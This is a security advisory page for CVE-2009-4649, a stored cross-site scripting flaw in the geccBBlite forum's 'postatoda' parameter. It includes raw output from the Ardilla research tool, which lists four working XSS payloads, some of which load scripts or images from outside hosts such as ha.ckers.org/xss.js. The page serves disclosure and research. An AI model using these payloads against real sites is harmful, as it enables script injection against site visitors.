geccBBlite 'postatoda' Parameter Multiple HTML Injection Vulnerabilities

2010.02.25
Credit: Adam Kiezun, Philip J. Guo, Karthick Jayaraman, and Michael D. E
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2009-4649
CWE: CWE-79


Ogólna skala CVSS: 4.3/10
Znaczenie: 2.9/10
Łatwość wykorzystania: 8.6/10
Wymagany dostęp: Zdalny
Złożoność ataku: Średnia
Autoryzacja: Nie wymagana
Wpływ na poufność: Brak
Wpływ na integralność: Częściowy
Wpływ na dostępność: Brak

//START ATTACKS FOUND -------------------------------- SECOND ORDER ATTACK /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/geccBBlite/scrivi.php vulnerability at UNKNOWN SITE Input: postatoda="<A HREF="http://ha.ckers.org@google">XSS</A>" testo="1" testonuovo="1" titolo="1" /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/geccBBlite/scrivi.php vulnerability at line:14 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/geccBBlite/forum.php Input:<empty> -------------------------------- SECOND ORDER ATTACK /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/geccBBlite/scrivi.php vulnerability at UNKNOWN SITE Input: postatoda="<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">" testo="1" testonuovo="1" titolo="1" /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/geccBBlite/scrivi.php vulnerability at line:16 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/geccBBlite/forum.php Input:<empty> -------------------------------- SECOND ORDER ATTACK /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/geccBBlite/scrivi.php vulnerability at UNKNOWN SITE Input: postatoda="<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>" testo="1" testonuovo="1" titolo="1" /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/geccBBlite/scrivi.php vulnerability at line:32 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/geccBBlite/forum.php Input: azione="espandi" -------------------------------- SECOND ORDER ATTACK /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/geccBBlite/scrivi.php vulnerability at UNKNOWN SITE Input: postatoda="<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>" testo="1" testonuovo="1" titolo="1" /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/geccBBlite/scrivi.php vulnerability at line:34 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/geccBBlite/forum.php Input: azione="espandi" //END ATTACKS FOUND attack count:4 pcLen:12.0 coveredEchos:17 coveredTaintedEchos:5 no more inputs to explore time:229725

Referencje:

http://xforce.iss.net/xforce/xfdb/56278
http://www.securityfocus.com/bid/35449
http://groups.csail.mit.edu/pag/ardilla/geccbblite-XSS2-strict-T.txt
http://groups.csail.mit.edu/pag/ardilla/geccbblite-XSS2-lenient-T.txt
http://groups.csail.mit.edu/pag/ardilla/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top